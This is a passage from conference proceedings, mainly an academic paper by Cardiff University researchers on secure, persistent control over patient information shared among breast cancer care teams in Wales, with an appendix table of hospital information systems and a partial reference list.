Education, Society for Advancing Information Assurance and Infrastructure Protection, Washington, D.C.,<br />
June 3-5, 2003.<br />
Zlateva, T.; J. Burstein: "A Web-Based Graduate Certificate for IT Professionals - Design Choices and First<br />
Evaluation Results". Proceedings of the 2001 Annual <strong>Conference</strong> of the American Society for Engineering<br />
Education(ASEE), June 24-27, Albuquerque, New Mexico. http://soa.asee.org/paper/conference/paperview.cfm?id=16617<br />
276
PhD<br />
Research<br />
Papers<br />
277
Towards Persistent Control over Shared Information in a<br />
Collaborative Environment<br />
Shada Alsalamah, Alex Gray and Jeremy Hilton<br />
Cardiff University, UK<br />
S.A.Salamah@cs.cardiff.ac.uk<br />
W.A.Gray@cs.cardiff.ac.uk<br />
Jeremy.hilton@cs.cardiff.ac.uk<br />
Abstract: In a complex collaborative environment, such as healthcare, where Multi-Disciplinary care Team<br />
(MDT) members and information come from independent organisational domains, there is a need for informationsharing<br />
across the organizations’ information systems in order to achieve the overall goal of collaboration.<br />
Inability to provide a secure communication method, giving local/global protection is affecting inter-professional<br />
communications and hindering sharing among MDT members. This research aims to facilitate a secure<br />
collaborative environment enabling persistent control over shared information across boundaries of the<br />
organisations that own the data. This paper is based on the early stages of the research and its results will feed<br />
into following stages. It looks at the structure of a healthcare system to understand the types of inter-professional<br />
communication and information exchange that occur in practice. Additionally it presents an initial assessment<br />
identifying the Information Security (IS) needs and challenges faced in providing persistent control in a shared<br />
collaborative environment by using conceptual modelling of a selected medical scenario (breast cancer in<br />
Wales). The results show that a considerable number of professionals are involved in a patient’s treatment. Each<br />
plays a well-defined role, but often uses different Healthcare Information Systems (HIS) to store sensitive and<br />
confidential patient medical information. These HIS cannot provide secure multi-organisational informationsharing<br />
to support collaboration among the MDT members. This causes inter-professional communication issues<br />
among team members that inhibit decision-making using the information. The findings from this study show how<br />
to improve information support from HIS stored information for MDT members. Also the resulting IS functions will<br />
be described which facilitate establishing secure collaborative environments guaranteeing persistent control over<br />
shared information.<br />
Keywords: information security, information system, Information sharing, multi-disciplinary team, persistent<br />
control, secure collaborative environment<br />
1. Introduction<br />
Current innovation in Information and Communication Technology (ICT) has encouraged collaboration<br />
within and among different fields, including healthcare. This has introduced novel inventions or<br />
tackled large-scale scientific problems. Such collaboration often demands extensive sharing of<br />
different resources among collaborating organisations in order to achieve an overall goal (Park and<br />
Sandhu, 2002; Wasson and Humphrey, 2003; Yau and Chen, 2008). Such collaboration may involve<br />
information in distributed resources being used and shared by users from geographically and<br />
administratively distributed physical organisations that own the resources. On all sites, these<br />
collaborations form Virtual Organisations (VOs) (Wasson and Humphrey, 2003; Yau and Chen, 2008).<br />
Therefore, a key characteristic of a VO is that users and information may come from different<br />
organisations, and thus various administrative domains (Thompson et al., 2003) with each applying<br />
local Information Security (IS) rules to protect its own information. As a result, when these<br />
organisations come together in a VO, they demand a Secure Collaborative Environment (SCE) for<br />
sharing resources, mainly information and data. However, there are three possible levels of protection<br />
when user(a) in domain(a) needs to share information with user(b) in domain(b) outside its secured<br />
administrative domain(a).<br />
Level 1 is local to domain(a) - user(a) loses control over the information once it is shared as the<br />
protection level applied inside domain(a) using IS rules(a) is not guaranteed outside this domain<br />
(once it has passed to domain(b) where IS rules(a) are not applied).<br />
Level 2 allows user(a) to have static control over the shared information when its protection is<br />
assured by user(b) using IS rules(b) when inside domain(b). (Here user(a) passes control to<br />
user(b), and although the information will still be protected, the rules applied change once the<br />
information is received, since user(a) has no control over domain(b)’s protection authority. Thus if<br />
the protection level of original information changes in domain(a), there is no guarantee that<br />
user(b) will also change it on the shared version of this information in domain(b). Additionally, if<br />
user(b) changes the protection on the shared version, user(a) cannot retain control).<br />
278
Shada Alsalamah et al.<br />
Level 3 allows dynamic control. It enables persistent control over information anywhere outside<br />
domain(a), including domain(b), using the rules(a) by communicating rules(a) along with the<br />
shared information. Furthermore, persistent control, in this context, enables synchronisation of<br />
any changes made regarding the protection level of the original information in domain(a) with the<br />
shared version of the information in domain(b). This guarantees full control of user(a) at all times<br />
by sustaining the original information protection level outside its domain, making it remotely<br />
editable. In this context, only the final protection level creates an SCE in a VO, therefore, a<br />
collaborative environment, with multiple independent domains, is referred to as an SCE, when<br />
each domain has persistent control over its shared information.<br />
Based on this, we can differentiate between level 2 and 3, in that the dynamic control creates an SCE,<br />
whereas the static control does not. This is because the latter leaves the information out of both<br />
users’ control at the point when it leaves domain(a) and before being received at domain(b), although<br />
it is secured otherwise.<br />
In fact, static and dynamic levels of information protection could suit different scenarios based on the<br />
information protection level required. This paper explores the need for SCEs in VOs and the<br />
challenges in implementing this environment by investigating a representative example of a VO,<br />
namely the healthcare scenario. This paper is based on a study-case scenario carried out in this<br />
naturally complex environment where healthcare professionals from different organisations critically<br />
need to collaborate and have control over exchanged medical information when treating a patient with<br />
breast cancer in Wales, UK. The paper is now divided into five main sections, which cover the<br />
problem statement, method for understanding the problem, results, a discussion of the results and<br />
conclusion.<br />
2. Problem statement<br />
In this scenario, the patient treatment delivery model is shifting from a disease-centric approach<br />
towards one that is patient-centric (Allam, 2006; Al-Salamah et al., 2009), and considers the patient’s<br />
medical condition as a whole rather than by managing patients as having separate diagnosed<br />
diseases, each treated by different professionals (Department of Health, 1997; Pirnejad, 2008; Al-<br />
Salamah et al., 2009). In a patient-centric approach, the patient is the central focus and is treated by a<br />
Multi-Disciplinary care Team (MDT) (Allam, 2006; Al-Salamah et al., 2009). This team consists of<br />
different healthcare professionals coming from different healthcare organisations to form a VO for<br />
patient treatment. This MDT, and hence the VO, evolves over time in response to the patient’s<br />
changing medical condition. In addition, in order to organise the MDT work and assist the delivery of<br />
patient treatment, a visual and structured care plan, called an Integrated Care Pathway (ICP), is<br />
followed. This plan reflects an ideal, evidence-based patient treatment journey for the condition<br />
(Zander, 2002; Al-Salamah et al., 2009; Map of Medicine, 2010e). In the UK, ICPs are based on<br />
having regular MDT meetings to discuss the patient’s case and provide recommendations for the<br />
treatment management plan. This new approach is increasing the need for sharing medical<br />
information among MDT members as they work together on treating the patient. Consequently, this<br />
will possibly require the information to leave the systems where each member stores patient<br />
information (Smith and Eloff, 1999; Thompson et al., 2003; Beale, 2004; Pirnejad, 2008). The<br />
distributed nature of this collaboration demands an effective SCE, that facilitates secure interprofessional<br />
communication among members, to exchange often-sensitive information.<br />
HISs currently used in patient treatment are hindering inter-professional communication among MDT<br />
members in the health environment. The literature shows that healthcare is suffering from poor interprofessional<br />
communication (Pirnejad, 2008) and this is a key factor contributing to medical errors<br />
(Mohyuddin et al., 2008; Al-Salamah et al., 2009). Indeed, research estimates an annual figure of<br />
850,000 medical errors occurring in NHS hospitals (Department of Health, 2000). These can lead to<br />
death, life-threatening illness, disability, admission to hospital, or prolongation of a hospital stay, as<br />
well as inevitable complications in treatment in some cases which might have been avoided in most<br />
cases if the patient had received ordinary standards of care (Department of Health, 2000; Aylin et al.,<br />
2004). Furthermore, the NHS spends around £400 million annually in settlement of clinical negligence<br />
claims, and has a potential liability of around £2.4 billion for existing and expected claims (Department<br />
of Health, 2000). However, a prime reason behind communication issues and medical errors in the<br />
healthcare environment is the limitation of HIS and ICT used in patient treatment (Smith and Eloff,<br />
1999; Commission for Health Improvement and Audit Commission, 2001; Anderson, 2008;<br />
Mohyuddin et al., 2008; Pirnejad, 2008; Al-Salamah et al., 2009; Skilton et al., 2009). These cause<br />
problems in data processing and representation, the amount of information they are capable of<br />
279
Shada Alsalamah et al.<br />
providing (Mohyuddin et al., 2008), and in communication at departmental, organisational, and even<br />
national levels (Al-Salamah et al., 2009). This is because some of these HISs were designed over 50<br />
years ago (Department of Health, 1997) and thus were tailored to meet the requirements of the<br />
disease-centric approach prevailing at that time (Al-Salamah et al., 2009; Skilton et al., 2009).<br />
Although legacy systems may be capable of providing local and static protection, in the new patientfocused<br />
approach, they hinder communication and information-sharing since protection is not<br />
guaranteed outside secured domains. As a result, information is only accessible within secured<br />
domains where such HISs exist (Lillian, 2009) and the only method of sharing is verbally or by printing<br />
on paper for posting. In addition, despite the fact that ICT is used in some healthcare organisations to<br />
improve communication, in practice, the results did not meet expectations, because either the HIS<br />
failed to be implemented in the healthcare environment or could not achieve implementation<br />
objectives (Commission for Health Improvement and Audit Commission, 2001; Pirnejad, 2008).<br />
Finally, according to Anderson (2008: 3-11), although the security requirements of these systems vary<br />
in terms of the collection of authentication, transaction integrity and accountability, message secrecy,<br />
and covertness they use, many fail because system designers protect either the wrong information, or<br />
the right information but in the wrong way. See reported incidents and concerns in (Blackhurst, 2010;<br />
NursingTimes, 2010a; NursingTimes, 2010b; Sturcke and Campbell, 2010).<br />
Nevertheless, implementation of the new patient-centric approach demands an SCE. The HIS is not<br />
like any other information system because of the “patient” entity. It holds extensive information<br />
combining patient’s biological details and social complexity (Beale, 2004). This information may<br />
contain personal (Office of Public Sector Information, 1998; Department of Health, 2003),<br />
embarrassing (Sturcke and Campbell, 2010), and critical medical information (National Institute for<br />
Healthcare and Clinical Excellence, 2002; Beale, 2004; Meystre, 2007). The nature of a customer or<br />
traveller’s information stored in a bank or airline system decays with age and normally once this<br />
information is published or exposed, protection is no longer required. Patient information, on the other<br />
hand, has a longevity characteristic (Beale, 2004) that will always render it highly sensitive (Smith and<br />
Eloff, 1999) and confidential (Department of Health, 2003); indeed, it is the type of information that will<br />
never expire even after the patient’s death. It is therefore critical to have constant protection with<br />
persistent control and the assurance that it will only be disclosed to the right person for permitted<br />
medical purposes (Department of Health, 2003). Since legacy HISs are not designed to achieve this,<br />
an SCE is essential to help members of MDTs share this information securely with persistent control.<br />
Most of the existing solutions attempt to protect information as long as it exists within the secured<br />
domain and when this information is shared across boundaries, it is no longer secured or controlled<br />
(Park and Sandhu, 2002; Burnap and Hilton, 2009; Nene and Swanson, 2009). Further examples are<br />
in (Chadwick, 2002; Alfieri, 2003). Furthermore, although several solutions are able to protect<br />
electronic information across domains such as Digital Rights Management and Usage Control (Park<br />
and Sandhu, 2002), they are either constrained by the number of uses and/or users (Nene and<br />
Swanson, 2009) or the control policy associated with the content cannot be modified by the<br />
information owner once disseminated (Thompson, et al., 2003). In fact, this is a vital issue that would<br />
prevent adapting to the dynamic nature of the VO environment, such as healthcare, where the need<br />
to protect the information is as important as the need for sharing it. For example, when members of<br />
the VO change their roles or one of the participating organizations goes out of existence, there will be<br />
a need to deny access to information previously shared (Burnap and Hilton, 2009). Therefore, these<br />
solutions are restricted and incapable of providing full protection with the flexibility of persistent<br />
control.<br />
However, enabling information-sharing across organisations with persistent control raises a number of<br />
IS issues and challenges that limit the effectiveness, dynamism, and potential of this collaborative<br />
working (Beale, 2004; Burnap and Hilton, 2009). Firstly, MDT members and information resources<br />
come from different organisations and administrative domains (Thompson et al., 2003). Although<br />
organisations adopt national good-practice guidelines and IS policies to protect in-house medical<br />
information, they adapt them to fit local needs and circumstances (Cancer Services Expert Group,<br />
2008). In other words, MDT members and the systems they use do not speak the same IS language<br />
either at the human or machine level. This makes interoperability difficult since there are no clear and<br />
precise IS policies and practice guidelines at a national level governing a VO-wide exchange of<br />
information. This may result in direct conflicts in terms of information access requirements between<br />
software applications of multiple vendors in use (Beale, 2004). Consequently, negotiating VO-wide<br />
agreements across organisations is often a lengthy and complex process (Thompson et al., 2003).<br />
Secondly, the collaboration demands extensive information-sharing among MDT members in order to<br />
280
Shada Alsalamah et al.<br />
assure the availability of relevant information in a continually changing scene. However, sharing<br />
sensitive information requires a focus on the person’s role in the treatment process, since different<br />
roles have different information requirements. This necessitates a careful balance between the<br />
availability of life-critical data and confidentiality of patient information so that it supports prompt<br />
reliable care without privacy violation. According to Beale (2004) and Anderson (2008: 3-11), these<br />
two requirements are in direct conflict, which make it hard to achieve, even using the current<br />
traditional computer security mechanisms. Thirdly, the human side in the collaborative environment<br />
increases the complexity. In each organisation, professionals and other employees involved with the<br />
management, use, or operation of the resources within the domain are normally mandated to attend<br />
annual organisation-wide IS training sessions to inform personnel of IS risks associated with their<br />
activities and their responsibilities in complying with organisation policies and procedures designed to<br />
reduce such risk, as well as, to manage resources and protect information. However, the absence of<br />
a VO-wide IS awareness means MDT members are unaware of the overall required IS needs of all<br />
involved organisations, and their responsibility to ensure information received from different<br />
organisations is protected and that its use is fit for purpose in the treatment. Fourthly, relevant medical<br />
information should be available across organisations seamlessly (Yau and Chen, 2008). Finally, there<br />
are additional existing technical, economic, political, ethical and logistical information ownership<br />
issues and barriers that hinder sharing across organisations (Smith and Eloff, 1999; Mandl et al.,<br />
2001; Beale, 2004; Cross, 2006).<br />
This research aims to address some of these issues and challenges by defining and implementing an<br />
approach that would help provide a SCE with persistent control. This should provide seamless remote<br />
access to information, that reflects the changing role of MDT members, as the treatment progresses<br />
along the ICP and provides only relevant information to the team members based on their current role<br />
in the treatment process. In addition, it should offer a common user-friendly set of IS rules to be used<br />
by MDT members from all involved organisations. These rules should be embedded in the information<br />
being shared in order to sustain the rules as defined by the information owner. Finally, having<br />
common IS rules will ease raising MDT members awareness of their responsibilities towards the<br />
protection of exchanged information. This will need to be developed in different research stages,<br />
starting with an understanding of the healthcare system and the information exchanges occurring in<br />
practice, to the investigation of the current information systems’ issues and MDT IS needs for the<br />
collaboration, and ending with a solution that would facilitate this secure sharing of information with<br />
persistent control.<br />
3. Method<br />
We believe it is important to gain an understanding of the inter-professional communication and<br />
information exchange in practice through the study of a real-life scenario. The breast cancer scenario<br />
in Wales was selected as a healthcare system whose structure would be examined to understand:<br />
how MDT members communicate; how HISs are used by the MDT to achieve the overall treatment<br />
goal; how the information is generated and stored; and how it can be used to support collaboration. In<br />
addition, it will allow an initial assessment that will help identify the IS needs for the SCE with<br />
persistent control.<br />
Our reference scenario’s conceptual model is the ICP treatment journey for breast cancer treatment in<br />
Wales. It is divided into six parts (Map of Medicine, 2010a; Map of Medicine, 2010b; Map of Medicine,<br />
2010c; Map of Medicine, 2010d; Map of Medicine, 2010g; Map of Medicine, 2010h), which are taken<br />
from the Map of Medicine (2010i, 2010f, 2010e) and so follow its recommended ICP for this disease.<br />
Using conceptual modelling, we investigated the different healthcare professionals involved in the<br />
treatment of patients, as they carried out their tasks defined by their roles in the six parts of the ICP,<br />
the different HISs used to serve the patient’s treatment at each step, the medical information<br />
generated and stored in these HISs for each task, the IS policies applied, and the inter-professional<br />
communication between the MDT members. Part of the conceptual model that was derived from the<br />
breast cancer ICP (Map of Medicine, 2010h) is shown in Figure1.<br />
281
Shada Alsalamah et al.<br />
Figure 1: Part of breast cancer treatment conceptual model<br />
4. Results<br />
Although the investigation is still under way, the following results have been found.<br />
First, according to the National Institute for Healthcare and Clinical Excellence (NICE) (2002), breast<br />
cancer diagnosis and treatment is a co-operative activity that involves a range of professionals, both<br />
within and outside the breast cancer unit. We found that there are at least 16 healthcare professionals<br />
involved in the treatment of a patient in this process in Wales. Although each plays a well-defined but<br />
different role, they are increasingly working in teams (Commission for Health Improvement and Audit<br />
Commission, 2001). Annually, each MDT diagnoses and treats 100 new breast cancer patients<br />
(NICE, 2002). The provision of a high quality service requires close co-operation between specialists<br />
from several disciplines and it is essential that care is provided by a breast cancer MDT in a specialist<br />
breast unit (Cancer Services Expert Group, 2008). In addition, there are at least two professionals for<br />
each role in the core breast care team (NICE, 2002). The different MDT members’ roles can be<br />
categorised into three different groups:<br />
Primary care personnel: GP, district nurse, and practice nurse.<br />
Principal specialist personnel (core breast cancer team): breast cancer nurse specialists, clinical<br />
and medical oncologists, radiologists, pathologists, and surgeons.<br />
Affiliated personnel: liaison psychiatrist and/or clinical psychologist, palliative care specialists and<br />
teams, physiotherapists and occupational therapists, surgeons experienced in breast<br />
reconstruction, clinical genetics, pharmacists, and haematologists.<br />
Second, there are at least seven HISs holding information about the patient with each having its own<br />
patient health record. This record stores sensitive and confidential personal and medical information.<br />
Although the HISs collectively adopt and adapt national guidelines, each applies its own and different<br />
policies and guidelines locally. These meet local needs and circumstances (Cancer Services Expert<br />
Group, 2008). The seven HISs found in this scenario and the different types of medical records they<br />
might contain are listed in Table1 in appendix A.<br />
Finally, a crucial feature of the breast cancer MDT is its composition, the way it works, and the<br />
coordinated care it offers. This team functions in the context of a cancer unit or centre, which may<br />
consist of one or more sites using shared facilities (NICE, 2002). NICE (2002) and the Commission<br />
282
Shada Alsalamah et al.<br />
for Health Improvement and Audit Commission (CHIAC) (2001) revealed audit and anecdotal<br />
evidence of problems in inter-professional communication and a failure to plan care in a systematic<br />
way between the different professionals involved. Such problems have been linked with complaints<br />
and litigation (NICE, 2002). For example, GPs sometimes lose track of patients during the treatment<br />
period or become unable to discuss the diagnosis and prognosis with patients due to lack of<br />
information from consultants. Furthermore, primary personnel can be unaware that a patient has been<br />
discharged, sometimes without necessary services or equipment being arranged. It can be unclear<br />
whether the GP or consultant is responsible for patient follow-up after treatment. Furthermore, the<br />
HISs are poor in their support of day to day working arrangements, including communication,<br />
appointment systems and shared protocols (CHIAC, 2001). Indeed, even if the care team is ready to<br />
share medical information (CHIAC, 2001), the current HISs are not supporting this sharing of<br />
information (CHIAC, 2001; Skilton et al., 2009). Finally, although many trusts do not have agreed<br />
policies for the management of cancers, where policies do exist, it is unclear whether they are<br />
followed because practice is not audited (CHIAC, 2001). Furthermore, formal policies and plans<br />
cannot ensure that services are provided in a patient-centred way, without a change in the attitudes<br />
and behaviour of those working with patients (CHIAC, 2001).<br />
5. Discussion and future work<br />
These results identify the different roles of MDT members involved in the treatment of patients with<br />
breast cancer in Wales, the HISs involved, the types of health records created in these systems, and<br />
medical information stored in these different records. This information helped the development of an<br />
understanding of the emerging need for the SCE for MDT members involved in treating patients with<br />
breast cancer. For example, some of the tasks carried out as the patient proceeds through the breast<br />
cancer’s ICP show a clear redundancy in some of the information collected, including, but not limited<br />
to, a clinical assessment and patient history check. It can save time and resources if this information<br />
was available for the healthcare professional in charge at the point of treatment. In addition, data<br />
redundancy can cause data inconsistency issues and having a single shared data record (i.e. patient<br />
history) guarantees the availability of up-to-date information for all MDT members. Another example is<br />
that GPs should support patients undergoing diagnosis, treatment and follow-up leading either to cure<br />
or to eventual death. This means GPs should follow patients from the very start of the ICP. Although<br />
patients may start their ICP at different stages, the GP should have direct contact with other breast<br />
cancer MDT members treating the patient in order to be informed about all of the patient’s current<br />
relevant medical information at all times. This would enable effective consultation and follow-up. In<br />
addition, there can be different professionals playing the same role and also one professional playing<br />
different roles. Furthermore, privacy violations can be expected if all of the members can see every<br />
patient’s records (Anderson, 2008). This emphasises the need for effective SCE with systems that<br />
can ensure the availability of life-critical information about the patient’s medical condition based on the<br />
professional’s role at the time of treatment. Also, the breast cancer MDT checks 100 patients<br />
annually. Each of these patients will be following different directions in the same ICP, and in some<br />
cases, following multiple ICPs as well, if the patient suffers from more than one disease. This will be<br />
difficult to manage without the support of an HIS that considers the patient condition as a whole.<br />
Therefore, good inter-professional communication is essential to co-ordinate the activities of all those<br />
involved, and ensure effective communication between professionals working in the primary,<br />
secondary and tertiary sectors of care. For that reason, the breast care MDT must develop and<br />
implement systems that ensure rapid and effective communication between all healthcare<br />
professionals involved in each patient’s treatment management. This would facilitate the provision of<br />
adequate means for communicating information on referral, diagnosis and treatment, follow-up, and<br />
supportive/palliative care throughout the stages of the ICP.<br />
The HISs identified in this research can be studied to identify the IS issues in these systems that<br />
hinder inter-professional communication. This can be achieved by investigating the IS rules applied in<br />
these HISs to protect medical information. This is an important step to take before speaking to all<br />
involved parties in order to know their IS needs to facilitate the SCE with others involved in the<br />
treatment. This can help identify and define the best way to have persistent control over the<br />
information accessed in a distributed environment when it will be moved outside the HIS’s locally<br />
controlled environment. This can be achieved either by agreeing on a set of common rules for all<br />
involved HISs to apply in a neutral administrative domain used for the sharing process, or by<br />
changing the way they work internally by standardising the IS rules. It may be that sharing in either of<br />
these ways is not possible at this point in time. The main aim of this research at the moment is to<br />
facilitate an SCE that can support collaboration among MDT members while guaranteeing persistent<br />
283
Shada Alsalamah et al.<br />
control over shared patient medical information in the future. This would be hard to achieve without<br />
the identification of the IS issues and emerging needs in this dynamic environment through the study<br />
of a real-life scenario.<br />
6. Conclusion<br />
There is a shift today towards collaboration among different healthcare organisations for a common<br />
goal of better patient treatment through moving to a patient centric control. In achieving this, an IS is<br />
essential to the effectiveness, dynamism, and potential of collaborative working if the full potential is<br />
to be realised. The provision of an SCE for multiple organisations has proved to be a challenge. This<br />
paper presents the results of a study into the inter-professional communication needs of a secure<br />
cross organisation’s information-sharing system in the healthcare domain. The findings in this paper<br />
provide the initial results from the first stage of the project and they will be used to inform further<br />
investigation in the ensuing stages to identify the key IS issues affecting inter-professional<br />
communication, as well as the IS needs in this environment which facilitate the sharing of information<br />
throughout the distributed domain.<br />
7. Appendix A<br />
The following table contains redundancy due to the information type appearing in more than one<br />
record type. This is indicated by [-] with numbers inside were the number refers to the other HIS<br />
record type containing this information. This redundancy has two causes, either the information is<br />
copied from another record to this system in which case the original should be the accurate<br />
information, or it can be due to separate readings being taken and the results being stored in these<br />
different systems. All records hold administrative/demographic data for each patient and Table 1 only<br />
lists non-administrative information.<br />
Table 1: HISs used in treating patients with breast cancer in Wales, UK<br />
HIS Health Record Type Information Stored<br />
1. GP-System GP-records Clinical presentation report<br />
Clinical assessment report<br />
Clinical history report-[2]<br />
Physical examination report-[2]<br />
Filled referral form (include patient details, referring doctor<br />
details, medical context, and referral information)-[2]<br />
Information about referred patients’ diagnosis (by the end of<br />
Triple Assessment path way)-[2]<br />
MDT recommendations and treatment plans-[2,6,7]<br />
Given treatment plan-[2]<br />
Given medication-[2]<br />
Follow-up plan-[2]<br />
2. Secondary-<br />
Care-System<br />
Follow-up visits report-[2]<br />
Secondary-care-records Referral form-[1]<br />
Clinical history report-[1]<br />
Clinical examination code-[1]<br />
Tests requests (e.g. blood, ultrasound, X-ray test)-[3,4]<br />
Blood test results report-[3]<br />
X-ray and Ultrasound results report-[4]<br />
Pathologists reports-[5]<br />
Radiologists and oncologists results reports-[6]<br />
Surgeons reports-[7]<br />
General patient case notes including: (BC diagnostic, staging,<br />
pathology information, histology reports, and tests’ result<br />
reports)-[1,3,4,5,6,7]<br />
General information addressing the patient’s specific situation<br />
(in leaflets, audio or video CDs format)<br />
MDT recommendations and treatment plans-[1,6,7]<br />
Given treatment plan<br />
Follow-up plan<br />
Follow-up visits report<br />
284
3. Hematology<br />
Laboratory<br />
System<br />
Whole Blood samples (for<br />
FBC)<br />
Blood for grouping, antibody<br />
screening and saving and/or<br />
cross-matching<br />
Request forms for grouping,<br />
antibody screening and crossmatching<br />
Results of grouping, antibody<br />
screening and cross-matching<br />
Lab file cards/working records<br />
of test results<br />
Shada Alsalamah et al.<br />
Tests requests-[2]<br />
General patient case notes-[1,2,4,5,6,7]<br />
Blood test results report<br />
FBC report<br />
Renal and liver function test report<br />
Blood Calcium test report<br />
HIS Health Record Type Information Stored<br />
4. X-ray-System X-ray films records<br />
X-ray reports (including<br />
reports for all imaging<br />
modalities)<br />
Breast screening X-rays<br />
records<br />
Ultrasound records<br />
5. Pathology-<br />
Laboratory-<br />
System<br />
6. Oncologysystem<br />
7. Surgicalsystem<br />
References<br />
Pathology records<br />
Human tissue<br />
Lab file cards/ working<br />
records of test results<br />
Oncology records<br />
Radiation dose records for<br />
classified persons<br />
Operating theatre registers<br />
Surgical records<br />
Test requests-[2]<br />
General patient case notes-[1,2,3,5,6,7]<br />
Mammography report<br />
X-ray images<br />
Ultrasound report<br />
Ultrasound images<br />
MRI report<br />
MRI images<br />
Isotope bone scan<br />
CT report and CXR image<br />
Abdomen ultrasound image<br />
Echocardiogram scan report and scan image<br />
DEXA scanning report and image<br />
Administrative information/ Demographic data-[1,2,3,4,6,7]<br />
Test requests from Oncologist-[6]<br />
General patient case notes-[1,2,3,4,6,7]<br />
Biopsy report with diagnosing code<br />
FNA report with diagnosing code<br />
Tissue samples<br />
The cancer tumour size, nodes, metastasis (TNM) staging<br />
code<br />
Tumour grade<br />
Histology report with biopsy diagnosing code<br />
Test requests-[2]<br />
General patient case notes-[1,2,3,4,5,7]<br />
MDT recommendations and treatment plan-[1,2,7]<br />
Test requests to Pathologist<br />
Cancer TNM staging code-[5]<br />
Tumour grade-[5]<br />
Neo-adjuvant endocrine therapy report<br />
Neo-adjuvant chemotherapy therapy report<br />
Chemotherapy drugs list and dose<br />
Radiotherapy report<br />
Adjuvant chemotherapy report (include the risk analysis)<br />
Hormonal therapy report<br />
Endocrine therapy report<br />
Bisphosphonates report<br />
Surgical report<br />
General patient case notes-[1,2,3,4,5,6]<br />
MDT recommendations and treatment plans-[1,2,6]<br />
Al-Salamah, H., Gray, A., Allam, O. and Morrey, D., (2009). Change Management along the Integrated Care<br />
Pathway. In: the 14th International Symposium on Health Information Management Research. Bath P,<br />
Petersson G, AND Steinschaden T editors. Kalmar, Sweden. pp. 53- 66.<br />
Alfieri, R. et al., (2003). VOMS, an Authorization System for Virtual Organizations. In: the 1st <strong>European</strong> Across<br />
Grids <strong>Conference</strong>. Santiago de Compostela. pp. 33-40.<br />
Allam, O., (2006). A Holistic Analysis Approach to Facilitating Communication between General Practitioners and<br />
Cancer Care Teams. Thesis. Department of Computer Science & Informatics. Cardiff University. Cardiff. pp.<br />
182.<br />
Anderson, R. J., (2008). Security Engineering 2nd ed. Indianapolis: Wiley Publishing.<br />
285
Shada Alsalamah et al.<br />
Aylin, P., Tanna, S., Bottle, A. and Jarman, B., (2004). How often are adverse events reported in English hospital<br />
statistics? BMJ, 329, (7462) 369.<br />
Beale, T., (2004). The Health Record - Why is it so hard? IMIA Yearbook of Medical Informatics 2005. Ubiquitous<br />
Health Care Systems. Haux R, Kulikowski C, editors. Stutt-gart: Schattauer. pp. 301-304.<br />
Burnap, P. and J. Hilton., (2009). Self Protecting Data for De-perimeterised Information Sharing. In: The Third<br />
International <strong>Conference</strong> on Digital Society, ICDS '09. Cancun, Mexico. pp. 65-70.<br />
Blackhurst, D., (2010). GPs fear breach of secret patient data, [online]. Available from:<br />
http://www.thisisstaffordshire.co.uk/news/GPs-fear-breach-secret-patient-data/article-772149detail/article.html<br />
[Accessed: 02 November 2010].<br />
Cancer Services Expert Group, (2008). Breast Cancer Task Group Report, The Cameron report, Cardiff: NHS<br />
Wales.<br />
Chadwick, D. W. and Otenko, A., (2002). The PERMIS X.509 role based privilege management infrastructure. In:<br />
Proceedings of the seventh ACM symposium on Access control models and technologies. Monterey,<br />
California, USA: ACM.<br />
Commission for Health Improvement and Audit Commission (CHIAC), (2001). National Service Framework<br />
Assessments No. 1: NHS Cancer Care in England and Wales. London: Commission for Health<br />
Improvement.<br />
Cross, M., (2010). Patients, not the state, own medical records, says GP, [online]. Guardian online. Available<br />
from: http://www.guardian.co.uk/technology/2006/jul/06/epublic.guardianweeklytechnologysection<br />
[Accessed: 01 March 2010].<br />
Department of Health, (1997). The new NHS: modern, dependable. London: HMSO.<br />
Department of Health, (2000). An organisation with a memory. London: HMSO.<br />
Department of Health, (2003). Confidentiality: NHS Code of Practice. London: HMSO.<br />
Department of Health, (2006). Records management: NHS code of practice. London: HMSO.<br />
Mandl, K. D.et al., (2001). Public standards and patients' control: how to keep electronic medical records<br />
accessible but private Commentary: Open approaches to electronic patient records Commentary: A<br />
patient's viewpoint. BMJ, 322, (7281) 283- 287.<br />
Map of Medicine, (2010a). Breast cancer - advanced, [online]. Available from:<br />
http://healthguides.mapofmedicine.com/choices/map/breast_cancer6.html [Accessed: 12 January 2010].<br />
Map of Medicine, (2010b). Breast cancer - local recurrence, [online]. Available from:<br />
http://healthguides.mapofmedicine.com/choices/map/breast_cancer5.html [Accessed: 12 January 2010].<br />
Map of Medicine, (2010c). Breast Cancer- suspected, [online]. Available from:<br />
http://healthguides.mapofmedicine.com/choices/map/breast_cancer1.html [Accessed: 12 January 2010].<br />
Map of Medicine, (2010d). Initial multidisciplinary team (MDT) review, [online]. Available from:<br />
http://healthguides.mapofmedicine.com/choices/map/breast_cancer3.html [Accessed: 12 January 2010].<br />
Map of Medicine, (2010e). Map of Medicine, [online]. Available from: http://mapofmedicine.com/ [Accessed: 12<br />
January 2010].<br />
Map of Medicine, (2010f). Map of Medicine Healthguides, [online]. Available from:<br />
http://www.mapofmedicine.com/solution/patientaccess/ [Accessed: 12 January 2010].<br />
Map of Medicine, (2010g). Postsurgical multidisciplinary team (MDT) review, [online]. Available from:<br />
http://healthguides.mapofmedicine.com/choices/map/breast_cancer4.html [Accessed: 12 January 2010].<br />
Map of Medicine, (2010h). Secondary care - triple assessment clinic, [online]. Available from:<br />
http://healthguides.mapofmedicine.com/choices/map/breast_cancer2.html [Accessed: 12 January 2010].<br />
Map of Medicine, (2010i). See what your doctor can see with Map of Medicine Healthguides, [online]. Available<br />
from: http://healthguides.mapofmedicine.com/choices/map/index.html [Accessed: 12 January 2010].<br />
Meystre, S., (2007). Electronic Patient Records: Some Answers to the Data Representation and Reuse<br />
Challenges. IMIA Yearbook 2007: Biomedical Informatics for Sustainable Health Systems, (1) 47- 48.<br />
Mohyuddin, Gray, W. A. et al., (2008). Wireless Patient Information Provision and Sharing at the Point of Care<br />
using a Virtual Organization Framework in Clinical Work. In: sixth Annual IEEE International <strong>Conference</strong> on<br />
Pervasive Computing and Communications. IEEE Computer Society. pp. 710 - 714.<br />
Nene, B. and Swanson, T., (2009). Information Rights Management Application Patterns, report: Microsoft<br />
Corporation.<br />
National Institute for Healthcare and Clinical Excellence (NICE), (2002). Improving Outcomes in Breast Cancer -<br />
Manual Update, report, London.<br />
Nursingtimes, (2010a). Data protection warning as more trusts lose patient records, [online]. Available from:<br />
http://www.nursingtimes.net/whats-new-in-nursing/acute-care/data-protection-warning-as-more-trusts-losepatient-records/5004097.article<br />
[Accessed: 01 June 2010].<br />
Nursingtimes, (2010b). Loss of patient details prompts warning for five trusts, [online]. Available from:<br />
